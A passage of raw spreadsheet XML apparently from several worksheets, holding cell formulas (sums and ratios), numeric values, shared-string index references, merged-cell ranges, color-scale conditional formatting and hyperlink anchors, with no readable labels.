      </c>
      <c r="AF44" s="189">
        <f t="shared" ref="AF44:AI44" si="36">Y44/Y22</f>
        <v>0.5</v>
      </c>
      <c r="AG44" s="189">
        <f t="shared" si="36"/>
        <v>0.5</v>
      </c>
      <c r="AH44" s="189">
        <f t="shared" si="36"/>
        <v>0.4</v>
      </c>
      <c r="AI44" s="190">
        <f t="shared" si="36"/>
        <v>0.1739130435</v>
      </c>
    </row>
    <row r="45">
      <c r="X45" s="158"/>
      <c r="Y45" s="158"/>
      <c r="Z45" s="158"/>
      <c r="AA45" s="158"/>
      <c r="AB45" s="158"/>
      <c r="AC45" s="158"/>
    </row>
    <row r="46">
      <c r="X46" s="158"/>
      <c r="Y46" s="158"/>
      <c r="Z46" s="158"/>
      <c r="AA46" s="158"/>
      <c r="AB46" s="158"/>
      <c r="AC46" s="158"/>
    </row>
    <row r="47">
      <c r="X47" s="180" t="s">
        <v>1219</v>
      </c>
      <c r="Y47" s="182">
        <f t="shared" ref="Y47:AC47" si="37">SUM(Y32:Y44)</f>
        <v>9</v>
      </c>
      <c r="Z47" s="182">
        <f t="shared" si="37"/>
        <v>40</v>
      </c>
      <c r="AA47" s="182">
        <f t="shared" si="37"/>
        <v>130</v>
      </c>
      <c r="AB47" s="182">
        <f t="shared" si="37"/>
        <v>158</v>
      </c>
      <c r="AC47" s="182">
        <f t="shared" si="37"/>
        <v>158</v>
      </c>
    </row>
    <row r="48">
      <c r="X48" s="180" t="s">
        <v>1220</v>
      </c>
      <c r="Y48" s="185">
        <f t="shared" ref="Y48:AB48" si="38">Y47/Y25</f>
        <v>0.07086614173</v>
      </c>
      <c r="Z48" s="185">
        <f t="shared" si="38"/>
        <v>0.1120448179</v>
      </c>
      <c r="AA48" s="185">
        <f t="shared" si="38"/>
        <v>0.3016241299</v>
      </c>
      <c r="AB48" s="185">
        <f t="shared" si="38"/>
        <v>0.1499051233</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="7">
    <mergeCell ref="C8:F8"/>
    <mergeCell ref="J8:O8"/>
    <mergeCell ref="Q8:V8"/>
    <mergeCell ref="X8:AC8"/>
    <mergeCell ref="AE8:AI8"/>
    <mergeCell ref="X30:AC30"/>
    <mergeCell ref="AE30:AI30"/>
  </mergeCells>
  <conditionalFormatting sqref="AF10:AI22">
    <cfRule type="colorScale" priority="1">
      <colorScale>
        <cfvo type="min"/>
        <cfvo type="max"/>
        <color rgb="FFFFFFFF"/>
        <color rgb="FFE67C73"/>
      </colorScale>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="AF32:AI44">
    <cfRule type="colorScale" priority="2">
      <colorScale>
        <cfvo type="min"/>
        <cfvo type="formula" val="0.5"/>
        <cfvo type="max"/>
        <color rgb="FFFFFFFF"/>
        <color rgb="FFABDDC5"/>
        <color rgb="FF57BB8A"/>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8"/>
    <col customWidth="1" min="4" max="4" width="23.0"/>
    <col customWidth="1" min="7" max="7" width="29.63"/>
  </cols>
  <sheetData>
    <row r="7">
      <c r="C7" s="112" t="s">
        <v>1221</v>
      </c>
      <c r="D7" s="113"/>
      <c r="E7" s="113"/>
      <c r="F7" s="113"/>
      <c r="G7" s="114"/>
      <c r="H7" s="191"/>
    </row>
    <row r="8">
      <c r="C8" s="116"/>
      <c r="D8" s="117"/>
      <c r="E8" s="117"/>
      <c r="F8" s="117"/>
      <c r="G8" s="118"/>
      <c r="H8" s="191"/>
    </row>
    <row r="11">
      <c r="C11" s="192" t="s">
        <v>1222</v>
      </c>
      <c r="D11" s="193" t="s">
        <v>1223</v>
      </c>
      <c r="E11" s="193" t="s">
        <v>3</v>
      </c>
      <c r="F11" s="193" t="s">
        <v>1224</v>
      </c>
      <c r="G11" s="194" t="s">
        <v>1225</v>
      </c>
      <c r="H11" s="6"/>
    </row>
    <row r="12" ht="66.0" customHeight="1">
      <c r="C12" s="195">
        <v>1.0</v>
      </c>
      <c r="D12" s="6" t="s">
        <v>1226</v>
      </c>
      <c r="E12" s="6">
        <v>2024.0</v>
      </c>
      <c r="F12" s="6" t="s">
        <v>1227</v>
      </c>
      <c r="G12" s="196" t="s">
        <v>1228</v>
      </c>
    </row>
    <row r="13">
      <c r="C13" s="195">
        <v>2.0</v>
      </c>
      <c r="D13" s="6" t="s">
        <v>1229</v>
      </c>
      <c r="E13" s="6">
        <v>2022.0</v>
      </c>
      <c r="F13" s="6" t="s">
        <v>1230</v>
      </c>
      <c r="G13" s="197" t="s">
        <v>1231</v>
      </c>
    </row>
    <row r="14">
      <c r="C14" s="195">
        <v>3.0</v>
      </c>
      <c r="D14" s="6" t="s">
        <v>1232</v>
      </c>
      <c r="E14" s="6">
        <v>2022.0</v>
      </c>
      <c r="F14" s="6" t="s">
        <v>1233</v>
      </c>
      <c r="G14" s="196" t="s">
        <v>1234</v>
      </c>
    </row>
    <row r="15">
      <c r="C15" s="195">
        <v>4.0</v>
      </c>
      <c r="D15" s="6" t="s">
        <v>1235</v>
      </c>
      <c r="E15" s="6">
        <v>2024.0</v>
      </c>
      <c r="F15" s="6" t="s">
        <v>1236</v>
      </c>
      <c r="G15" s="198"/>
    </row>
    <row r="16">
      <c r="C16" s="195">
        <v>5.0</v>
      </c>
      <c r="D16" s="6" t="s">
        <v>1237</v>
      </c>
      <c r="E16" s="6">
        <v>2024.0</v>
      </c>
      <c r="F16" s="6" t="s">
        <v>1238</v>
      </c>
      <c r="G16" s="198"/>
    </row>
    <row r="17">
      <c r="C17" s="199">
        <v>6.0</v>
      </c>
      <c r="D17" s="200" t="s">
        <v>1239</v>
      </c>
      <c r="E17" s="200">
        <v>2018.0</v>
      </c>
      <c r="F17" s="200" t="s">
        <v>1240</v>
      </c>
      <c r="G17" s="201" t="s">
        <v>1241</v>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="6"/>
      <c r="B40" s="6"/>
      <c r="C40" s="6"/>
      <c r="D40" s="6"/>
      <c r="E40" s="6"/>
      <c r="F40" s="6"/>
    </row>
  </sheetData>
  <mergeCells count="1">
    <mergeCell ref="C7:G8"/>
  </mergeCells>
  <hyperlinks>
    <hyperlink r:id="rId1" ref="G12"/>
    <hyperlink r:id="rId2" ref="G13"/>
    <hyperlink r:id="rId3" ref="G14"/>
    <hyperlink r:id="rId4" ref="G17"/>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25.13"/>
    <col customWidth="1" min="17" max="20" width="27.63"/>
    <col customWidth="1" min="21" max="22" width="25.13"/>
  </cols>
  <sheetData>
    <row r="4" ht="60.0" customHeight="1">
      <c r="A4" s="145"/>
      <c r="B4" s="202" t="s">
        <v>19</v>
      </c>
      <c r="C4" s="34" t="s">
        <v>20</v>
      </c>
      <c r="D4" s="34" t="s">
        <v>21</v>
      </c>
      <c r="E4" s="34" t="s">
        <v>22</v>
      </c>
      <c r="F4" s="34" t="s">
        <v>23</v>
      </c>
      <c r="G4" s="34" t="s">
        <v>24</v>
      </c>
      <c r="H4" s="34" t="s">
        <v>25</v>
      </c>
      <c r="I4" s="34" t="s">
        <v>26</v>
      </c>
      <c r="J4" s="203" t="s">
        <v>27</v>
      </c>
      <c r="K4" s="43" t="s">
        <v>28</v>
      </c>
      <c r="L4" s="43" t="s">
        <v>29</v>
      </c>
      <c r="M4" s="43" t="s">
        <v>1242</v>
      </c>
      <c r="N4" s="43" t="s">
        <v>30</v>
      </c>
      <c r="O4" s="204" t="s">
        <v>31</v>
      </c>
      <c r="P4" s="205" t="s">
        <v>32</v>
      </c>
      <c r="Q4" s="206" t="s">
        <v>1243</v>
      </c>
      <c r="R4" s="206" t="s">
        <v>1244</v>
      </c>
      <c r="S4" s="206" t="s">
        <v>1245</v>
      </c>
      <c r="T4" s="206" t="s">
        <v>1246</v>
      </c>
      <c r="U4" s="206" t="s">
        <v>1247</v>
      </c>
      <c r="V4" s="205" t="s">
        <v>1248</v>
      </c>
      <c r="W4" s="145"/>
      <c r="X4" s="145"/>
      <c r="Y4" s="145"/>
      <c r="Z4" s="145"/>
      <c r="AA4" s="145"/>
    </row>
    <row r="5" ht="90.0" customHeight="1">
      <c r="B5" s="44" t="s">
        <v>46</v>
      </c>
      <c r="C5" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D5" s="45" t="s">
        <v>47</v>
      </c>
      <c r="E5" s="45" t="s">
        <v>48</v>
      </c>
      <c r="F5" s="45" t="s">
        <v>49</v>
      </c>
      <c r="G5" s="45" t="s">
        <v>50</v>
      </c>
      <c r="H5" s="46" t="s">
        <v>51</v>
      </c>
      <c r="I5" s="46" t="s">
        <v>52</v>
      </c>
      <c r="J5" s="46" t="s">
        <v>53</v>
      </c>
      <c r="K5" s="47">
        <v>1.0</v>
      </c>
      <c r="L5" s="47">
        <v>0.0</v>
      </c>
      <c r="M5" s="47" t="s">
        <v>64</v>
      </c>
      <c r="N5" s="207" t="s">
        <v>1249</v>
      </c>
      <c r="O5" s="207">
        <v>2.0</v>
      </c>
      <c r="P5" s="207">
        <v>19.0</v>
      </c>
      <c r="Q5" s="208"/>
      <c r="R5" s="208"/>
      <c r="S5" s="208"/>
      <c r="T5" s="208"/>
      <c r="U5" s="208"/>
      <c r="V5" s="208"/>
    </row>
    <row r="6" ht="90.0" customHeight="1">
      <c r="B6" s="44" t="s">
        <v>46</v>
      </c>
      <c r="C6" s="55" t="s">
        <v>10</v>
      </c>
      <c r="D6" s="55" t="s">
        <v>47</v>
      </c>
      <c r="E6" s="45" t="s">
        <v>48</v>
      </c>
      <c r="F6" s="55" t="s">
        <v>65</v>
      </c>
      <c r="G6" s="45" t="s">
        <v>66</v>
      </c>
      <c r="H6" s="46" t="s">
        <v>67</v>
      </c>
      <c r="I6" s="46" t="s">
        <v>68</v>
      </c>
      <c r="J6" s="46" t="s">
        <v>69</v>
      </c>
      <c r="K6" s="47">
        <v>1.0</v>
      </c>
      <c r="L6" s="47">
        <v>0.0</v>
      </c>
      <c r="M6" s="47" t="s">
        <v>64</v>
      </c>
      <c r="N6" s="207" t="s">
        <v>10</v>
      </c>
      <c r="O6" s="207" t="s">
        <v>10</v>
      </c>
      <c r="P6" s="207" t="s">
        <v>10</v>
      </c>
      <c r="Q6" s="208"/>
      <c r="R6" s="208"/>
      <c r="S6" s="208"/>
      <c r="T6" s="208"/>
      <c r="U6" s="208"/>
      <c r="V6" s="208"/>
    </row>
    <row r="7" ht="90.0" customHeight="1">
      <c r="B7" s="44" t="s">
        <v>46</v>
      </c>
      <c r="C7" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D7" s="45" t="s">
        <v>47</v>
      </c>
      <c r="E7" s="45" t="s">
        <v>48</v>
      </c>
      <c r="F7" s="45" t="s">
        <v>65</v>
      </c>
      <c r="G7" s="45" t="s">
        <v>66</v>
      </c>
      <c r="H7" s="46" t="s">
        <v>67</v>
      </c>
      <c r="I7" s="46" t="s">
        <v>76</v>
      </c>
      <c r="J7" s="46" t="s">
        <v>77</v>
      </c>
      <c r="K7" s="47">
        <v>1.0</v>
      </c>
      <c r="L7" s="47">
        <v>0.0</v>
      </c>
      <c r="M7" s="47" t="s">
        <v>64</v>
      </c>
      <c r="N7" s="207">
        <v>12648.0</v>
      </c>
      <c r="O7" s="207">
        <v>1.0</v>
      </c>
      <c r="P7" s="207">
        <v>1.0</v>
      </c>
      <c r="Q7" s="208"/>
      <c r="R7" s="208"/>
      <c r="S7" s="208"/>
      <c r="T7" s="208"/>
      <c r="U7" s="208"/>
      <c r="V7" s="208"/>
    </row>
    <row r="8" ht="90.0" customHeight="1">
      <c r="B8" s="44" t="s">
        <v>46</v>
      </c>
      <c r="C8" s="55" t="s">
        <v>10</v>
      </c>
      <c r="D8" s="55" t="s">
        <v>86</v>
      </c>
      <c r="E8" s="45" t="s">
        <v>87</v>
      </c>
      <c r="F8" s="55" t="s">
        <v>88</v>
      </c>
      <c r="G8" s="45" t="s">
        <v>89</v>
      </c>
      <c r="H8" s="46" t="s">
        <v>90</v>
      </c>
      <c r="I8" s="46" t="s">
        <v>68</v>
      </c>
      <c r="J8" s="46" t="s">
        <v>91</v>
      </c>
      <c r="K8" s="47">
        <v>1.0</v>
      </c>
      <c r="L8" s="47">
        <v>0.0</v>
      </c>
      <c r="M8" s="47" t="s">
        <v>64</v>
      </c>
      <c r="N8" s="207" t="s">
        <v>10</v>
      </c>
      <c r="O8" s="207" t="s">
        <v>10</v>
      </c>
      <c r="P8" s="207" t="s">
        <v>10</v>
      </c>
      <c r="Q8" s="208"/>
      <c r="R8" s="208"/>
      <c r="S8" s="208"/>
      <c r="T8" s="208"/>
      <c r="U8" s="208"/>
      <c r="V8" s="208"/>
    </row>
    <row r="9" ht="90.0" customHeight="1">
      <c r="B9" s="44" t="s">
        <v>46</v>
      </c>
      <c r="C9" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D9" s="45" t="s">
        <v>96</v>
      </c>
      <c r="E9" s="45" t="s">
        <v>97</v>
      </c>
      <c r="F9" s="45" t="s">
        <v>98</v>
      </c>
      <c r="G9" s="61" t="s">
        <v>99</v>
      </c>
      <c r="H9" s="46" t="s">
        <v>100</v>
      </c>
      <c r="I9" s="46" t="s">
        <v>101</v>
      </c>
      <c r="J9" s="46" t="s">
        <v>102</v>
      </c>
      <c r="K9" s="47">
        <v>1.0</v>
      </c>
      <c r="L9" s="47">
        <v>0.0</v>
      </c>
      <c r="M9" s="47" t="s">
        <v>64</v>
      </c>
      <c r="N9" s="207" t="s">
        <v>10</v>
      </c>
      <c r="O9" s="207" t="s">
        <v>10</v>
      </c>
      <c r="P9" s="207" t="s">
        <v>10</v>
      </c>
      <c r="Q9" s="208"/>
      <c r="R9" s="208"/>
      <c r="S9" s="208"/>
      <c r="T9" s="208"/>
      <c r="U9" s="208"/>
      <c r="V9" s="208"/>
    </row>
    <row r="10" ht="90.0" customHeight="1">
      <c r="B10" s="44" t="s">
        <v>46</v>
      </c>
      <c r="C10" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D10" s="45" t="s">
        <v>109</v>
      </c>
      <c r="E10" s="45" t="s">
        <v>110</v>
      </c>
      <c r="F10" s="45" t="s">
        <v>111</v>
      </c>
      <c r="G10" s="61" t="s">
        <v>112</v>
      </c>
      <c r="H10" s="46" t="s">
        <v>113</v>
      </c>
      <c r="I10" s="46" t="s">
        <v>114</v>
      </c>
      <c r="J10" s="46" t="s">
        <v>115</v>
      </c>
      <c r="K10" s="47">
        <v>1.0</v>
      </c>
      <c r="L10" s="47">
        <v>0.0</v>
      </c>
      <c r="M10" s="47" t="s">
        <v>64</v>
      </c>
      <c r="N10" s="207" t="s">
        <v>10</v>
      </c>
      <c r="O10" s="207" t="s">
        <v>10</v>
      </c>
      <c r="P10" s="207" t="s">
        <v>10</v>
      </c>
      <c r="Q10" s="208"/>
      <c r="R10" s="208"/>
      <c r="S10" s="208"/>
      <c r="T10" s="208"/>
      <c r="U10" s="208"/>
      <c r="V10" s="208"/>
    </row>
    <row r="11" ht="90.0" customHeight="1">
      <c r="B11" s="44" t="s">
        <v>119</v>
      </c>
      <c r="C11" s="55" t="s">
        <v>10</v>
      </c>
      <c r="D11" s="45" t="s">
        <v>120</v>
      </c>
      <c r="E11" s="45" t="s">
        <v>121</v>
      </c>
      <c r="F11" s="55" t="s">
        <v>122</v>
      </c>
      <c r="G11" s="45" t="s">
        <v>123</v>
      </c>
      <c r="H11" s="63" t="s">
        <v>124</v>
      </c>
      <c r="I11" s="46" t="s">
        <v>125</v>
      </c>
      <c r="J11" s="46" t="s">
        <v>126</v>
      </c>
      <c r="K11" s="47">
        <v>1.0</v>
      </c>
      <c r="L11" s="47">
        <v>0.0</v>
      </c>
      <c r="M11" s="47" t="s">
        <v>64</v>
      </c>
      <c r="N11" s="207">
        <v>12648.0</v>
      </c>
      <c r="O11" s="207">
        <v>1.0</v>
      </c>
      <c r="P11" s="207">
        <v>304.0</v>
      </c>
      <c r="Q11" s="208"/>
      <c r="R11" s="208"/>
      <c r="S11" s="208"/>
      <c r="T11" s="208"/>
      <c r="U11" s="208"/>
      <c r="V11" s="208"/>
    </row>
    <row r="12" ht="90.0" customHeight="1">
      <c r="B12" s="44" t="s">
        <v>119</v>
      </c>
      <c r="C12" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D12" s="45" t="s">
        <v>134</v>
      </c>
      <c r="E12" s="45" t="s">
        <v>135</v>
      </c>
      <c r="F12" s="45" t="s">
        <v>122</v>
      </c>
      <c r="G12" s="61" t="s">
        <v>136</v>
      </c>
      <c r="H12" s="46" t="s">
        <v>137</v>
      </c>
      <c r="I12" s="46" t="s">
        <v>138</v>
      </c>
      <c r="J12" s="46" t="s">
        <v>139</v>
      </c>
      <c r="K12" s="47">
        <v>1.0</v>
      </c>
      <c r="L12" s="47">
        <v>0.0</v>
      </c>
      <c r="M12" s="47" t="s">
        <v>64</v>
      </c>
      <c r="N12" s="207" t="s">
        <v>10</v>
      </c>
      <c r="O12" s="207" t="s">
        <v>10</v>
      </c>
      <c r="P12" s="207" t="s">
        <v>10</v>
      </c>
      <c r="Q12" s="208"/>
      <c r="R12" s="208"/>
      <c r="S12" s="208"/>
      <c r="T12" s="208"/>
      <c r="U12" s="208"/>
      <c r="V12" s="208"/>
    </row>
    <row r="13" ht="90.0" customHeight="1">
      <c r="B13" s="44" t="s">
        <v>119</v>
      </c>
      <c r="C13" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D13" s="45" t="s">
        <v>143</v>
      </c>
      <c r="E13" s="45" t="s">
        <v>144</v>
      </c>
      <c r="F13" s="45" t="s">
        <v>145</v>
      </c>
      <c r="G13" s="61" t="s">
        <v>144</v>
      </c>
      <c r="H13" s="46" t="s">
        <v>146</v>
      </c>
      <c r="I13" s="46" t="s">
        <v>147</v>
      </c>
      <c r="J13" s="46" t="s">
        <v>148</v>
      </c>
      <c r="K13" s="47">
        <v>1.0</v>
      </c>
      <c r="L13" s="47">
        <v>0.0</v>
      </c>
      <c r="M13" s="47" t="s">
        <v>64</v>
      </c>
      <c r="N13" s="207" t="s">
        <v>10</v>
      </c>
      <c r="O13" s="207" t="s">
        <v>10</v>
      </c>
      <c r="P13" s="207" t="s">
        <v>10</v>
      </c>
      <c r="Q13" s="208"/>
      <c r="R13" s="208"/>
      <c r="S13" s="208"/>
      <c r="T13" s="208"/>
      <c r="U13" s="208"/>
      <c r="V13" s="208"/>
    </row>
    <row r="14" ht="90.0" customHeight="1">
      <c r="B14" s="44" t="s">
        <v>119</v>
      </c>
      <c r="C14" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D14" s="45" t="s">
        <v>143</v>
      </c>
      <c r="E14" s="45" t="s">
        <v>144</v>
      </c>
      <c r="F14" s="45" t="s">
        <v>145</v>
      </c>
      <c r="G14" s="61" t="s">
        <v>144</v>
      </c>
      <c r="H14" s="46" t="s">
        <v>154</v>
      </c>
      <c r="I14" s="46" t="s">
        <v>147</v>
      </c>
      <c r="J14" s="46" t="s">
        <v>155</v>
      </c>
      <c r="K14" s="47">
        <v>1.0</v>
      </c>
      <c r="L14" s="47">
        <v>0.0</v>
      </c>
      <c r="M14" s="47" t="s">
        <v>64</v>
      </c>
      <c r="N14" s="207" t="s">
        <v>10</v>
      </c>
      <c r="O14" s="207" t="s">
        <v>10</v>
      </c>
      <c r="P14" s="207" t="s">
        <v>10</v>
      </c>
      <c r="Q14" s="208"/>
      <c r="R14" s="208"/>
      <c r="S14" s="208"/>
      <c r="T14" s="208"/>
      <c r="U14" s="208"/>
      <c r="V14" s="208"/>
    </row>
    <row r="15" ht="90.0" customHeight="1">
      <c r="B15" s="44" t="s">
        <v>119</v>
      </c>
      <c r="C15" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D15" s="45" t="s">
        <v>143</v>
      </c>
      <c r="E15" s="45" t="s">
        <v>159</v>
      </c>
      <c r="F15" s="45" t="s">
        <v>160</v>
      </c>
      <c r="G15" s="61" t="s">
        <v>159</v>
      </c>
      <c r="H15" s="46" t="s">
        <v>161</v>
      </c>
      <c r="I15" s="46" t="s">
        <v>162</v>
      </c>
      <c r="J15" s="46" t="s">
        <v>163</v>
      </c>
      <c r="K15" s="47">
        <v>1.0</v>
      </c>
      <c r="L15" s="47">
        <v>0.0</v>
      </c>
      <c r="M15" s="47" t="s">
        <v>64</v>
      </c>
      <c r="N15" s="207" t="s">
        <v>10</v>
      </c>
      <c r="O15" s="207" t="s">
        <v>10</v>
      </c>
      <c r="P15" s="207" t="s">
        <v>10</v>
      </c>
      <c r="Q15" s="208"/>
      <c r="R15" s="208"/>
      <c r="S15" s="208"/>
      <c r="T15" s="208"/>
      <c r="U15" s="208"/>
      <c r="V15" s="208"/>
    </row>
    <row r="16" ht="90.0" customHeight="1">
      <c r="B16" s="44" t="s">
        <v>171</v>
      </c>
      <c r="C16" s="45" t="s">
        <v>172</v>
      </c>
      <c r="D16" s="45" t="s">
        <v>173</v>
      </c>
      <c r="E16" s="45" t="s">
        <v>174</v>
      </c>
      <c r="F16" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G16" s="61" t="s">
        <v>10</v>
      </c>
      <c r="H16" s="46" t="s">
        <v>175</v>
      </c>
      <c r="I16" s="46" t="s">
        <v>176</v>
      </c>
      <c r="J16" s="46" t="s">
        <v>177</v>
      </c>
      <c r="K16" s="47">
        <v>1.0</v>
      </c>
      <c r="L16" s="47">
        <v>0.0</v>
      </c>
      <c r="M16" s="47" t="s">
        <v>64</v>
      </c>
      <c r="N16" s="207" t="s">
        <v>10</v>
      </c>
      <c r="O16" s="207" t="s">
        <v>10</v>
      </c>
      <c r="P16" s="207" t="s">
        <v>10</v>
      </c>
      <c r="Q16" s="208"/>
      <c r="R16" s="208"/>
      <c r="S16" s="208"/>
      <c r="T16" s="208"/>
      <c r="U16" s="208"/>
      <c r="V16" s="208"/>
    </row>
    <row r="17" ht="90.0" customHeight="1">
      <c r="B17" s="44" t="s">
        <v>171</v>
      </c>
      <c r="C17" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D17" s="45" t="s">
        <v>186</v>
      </c>
      <c r="E17" s="45" t="s">
        <v>187</v>
      </c>
      <c r="F17" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G17" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H17" s="46" t="s">
        <v>188</v>
      </c>
      <c r="I17" s="46" t="s">
        <v>189</v>
      </c>
      <c r="J17" s="46" t="s">
        <v>190</v>
      </c>
      <c r="K17" s="47">
        <v>1.0</v>
      </c>
      <c r="L17" s="47">
        <v>0.0</v>
      </c>
      <c r="M17" s="47" t="s">
        <v>64</v>
      </c>
      <c r="N17" s="207">
        <v>15621.0</v>
      </c>
      <c r="O17" s="207">
        <v>1.0</v>
      </c>
      <c r="P17" s="207">
        <v>1.0</v>
      </c>
      <c r="Q17" s="208"/>
      <c r="R17" s="208"/>
      <c r="S17" s="208"/>
      <c r="T17" s="208"/>
      <c r="U17" s="208"/>
      <c r="V17" s="208"/>
    </row>
    <row r="18" ht="90.0" customHeight="1">
      <c r="B18" s="44" t="s">
        <v>171</v>
      </c>
      <c r="C18" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D18" s="45" t="s">
        <v>186</v>
      </c>
      <c r="E18" s="45" t="s">
        <v>187</v>
      </c>
      <c r="F18" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G18" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H18" s="46" t="s">
        <v>188</v>
      </c>
      <c r="I18" s="46" t="s">
        <v>189</v>
      </c>
      <c r="J18" s="46" t="s">
        <v>196</v>
      </c>
      <c r="K18" s="47">
        <v>1.0</v>
      </c>
      <c r="L18" s="47">
        <v>0.0</v>
      </c>
      <c r="M18" s="47" t="s">
        <v>64</v>
      </c>
      <c r="N18" s="207" t="s">
        <v>1250</v>
      </c>
      <c r="O18" s="207">
        <v>2.0</v>
      </c>
      <c r="P18" s="207">
        <v>150.0</v>
      </c>
      <c r="Q18" s="208"/>
      <c r="R18" s="208"/>
      <c r="S18" s="208"/>
      <c r="T18" s="208"/>
      <c r="U18" s="208"/>
      <c r="V18" s="208"/>
    </row>
    <row r="19" ht="90.0" customHeight="1">
      <c r="B19" s="44" t="s">
        <v>171</v>
      </c>
      <c r="C19" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D19" s="45" t="s">
        <v>186</v>
      </c>
      <c r="E19" s="45" t="s">
        <v>187</v>
      </c>
      <c r="F19" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G19" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H19" s="46" t="s">
        <v>188</v>
      </c>
      <c r="I19" s="46" t="s">
        <v>203</v>
      </c>
      <c r="J19" s="46" t="s">
        <v>204</v>
      </c>
      <c r="K19" s="47">
        <v>1.0</v>
      </c>
      <c r="L19" s="47">
        <v>0.0</v>
      </c>
      <c r="M19" s="47" t="s">
        <v>64</v>
      </c>
      <c r="N19" s="207">
        <v>15621.0</v>
      </c>
      <c r="O19" s="207">
        <v>1.0</v>
      </c>
      <c r="P19" s="207">
        <v>37.0</v>
      </c>
      <c r="Q19" s="208"/>
      <c r="R19" s="208"/>
      <c r="S19" s="208"/>
      <c r="T19" s="208"/>
      <c r="U19" s="208"/>
      <c r="V19" s="208"/>
    </row>
    <row r="20" ht="90.0" customHeight="1">
      <c r="B20" s="44" t="s">
        <v>171</v>
      </c>
      <c r="C20" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D20" s="45" t="s">
        <v>207</v>
      </c>
      <c r="E20" s="45" t="s">
        <v>208</v>
      </c>
      <c r="F20" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G20" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H20" s="46" t="s">
        <v>209</v>
      </c>
      <c r="I20" s="46" t="s">
        <v>210</v>
      </c>
      <c r="J20" s="46" t="s">
        <v>211</v>
      </c>
      <c r="K20" s="47">
        <v>1.0</v>
      </c>
      <c r="L20" s="47">
        <v>0.0</v>
      </c>
      <c r="M20" s="47" t="s">
        <v>64</v>
      </c>
      <c r="N20" s="207">
        <v>49480.0</v>
      </c>
      <c r="O20" s="207">
        <v>1.0</v>
      </c>
      <c r="P20" s="207">
        <v>3.0</v>
      </c>
      <c r="Q20" s="208"/>
      <c r="R20" s="208"/>
      <c r="S20" s="208"/>
      <c r="T20" s="208"/>
      <c r="U20" s="208"/>
      <c r="V20" s="208"/>
    </row>
    <row r="21" ht="90.0" customHeight="1">
      <c r="B21" s="44" t="s">
        <v>171</v>
      </c>
      <c r="C21" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D21" s="45" t="s">
        <v>207</v>
      </c>
      <c r="E21" s="45" t="s">
        <v>208</v>
      </c>
      <c r="F21" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G21" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H21" s="46" t="s">
        <v>217</v>
      </c>
      <c r="I21" s="46" t="s">
        <v>210</v>
      </c>
      <c r="J21" s="46" t="s">
        <v>218</v>
      </c>
      <c r="K21" s="47">
        <v>1.0</v>
      </c>
      <c r="L21" s="47">
        <v>0.0</v>
      </c>
      <c r="M21" s="47" t="s">
        <v>64</v>
      </c>
      <c r="N21" s="207" t="s">
        <v>10</v>
      </c>
      <c r="O21" s="207" t="s">
        <v>10</v>
      </c>
      <c r="P21" s="207" t="s">
        <v>10</v>
      </c>
      <c r="Q21" s="208"/>
      <c r="R21" s="208"/>
      <c r="S21" s="208"/>
      <c r="T21" s="208"/>
      <c r="U21" s="208"/>
      <c r="V21" s="208"/>
    </row>
    <row r="22" ht="90.0" customHeight="1">
      <c r="B22" s="67" t="s">
        <v>171</v>
      </c>
      <c r="C22" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D22" s="45" t="s">
        <v>221</v>
      </c>
      <c r="E22" s="45" t="s">
        <v>222</v>
      </c>
      <c r="F22" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G22" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H22" s="46" t="s">
        <v>223</v>
      </c>
      <c r="I22" s="46" t="s">
        <v>224</v>
      </c>
      <c r="J22" s="46" t="s">
        <v>225</v>
      </c>
      <c r="K22" s="47">
        <v>1.0</v>
      </c>
      <c r="L22" s="47">
        <v>0.0</v>
      </c>
      <c r="M22" s="47" t="s">
        <v>64</v>
      </c>
      <c r="N22" s="207" t="s">
        <v>10</v>
      </c>
      <c r="O22" s="207" t="s">
        <v>10</v>
      </c>
      <c r="P22" s="207" t="s">
        <v>10</v>
      </c>
      <c r="Q22" s="208"/>
      <c r="R22" s="208"/>
      <c r="S22" s="208"/>
      <c r="T22" s="208"/>
      <c r="U22" s="208"/>
      <c r="V22" s="208"/>
    </row>
    <row r="23" ht="90.0" customHeight="1">
      <c r="B23" s="67" t="s">
        <v>171</v>
      </c>
      <c r="C23" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D23" s="45" t="s">
        <v>229</v>
      </c>
      <c r="E23" s="45" t="s">
        <v>230</v>
      </c>
      <c r="F23" s="45" t="s">
        <v>231</v>
      </c>
      <c r="G23" s="45" t="s">
        <v>232</v>
      </c>
      <c r="H23" s="46" t="s">
        <v>233</v>
      </c>
      <c r="I23" s="46" t="s">
        <v>10</v>
      </c>
      <c r="J23" s="46" t="s">
        <v>234</v>
      </c>
      <c r="K23" s="47">
        <v>1.0</v>
      </c>
      <c r="L23" s="47">
        <v>0.0</v>
      </c>
      <c r="M23" s="47" t="s">
        <v>64</v>
      </c>
      <c r="N23" s="207" t="s">
        <v>1251</v>
      </c>
      <c r="O23" s="207">
        <v>2.0</v>
      </c>
      <c r="P23" s="207">
        <v>3.0</v>
      </c>
      <c r="Q23" s="208"/>
      <c r="R23" s="208"/>
      <c r="S23" s="208"/>
      <c r="T23" s="208"/>
      <c r="U23" s="208"/>
      <c r="V23" s="208"/>
    </row>
    <row r="24" ht="90.0" customHeight="1">
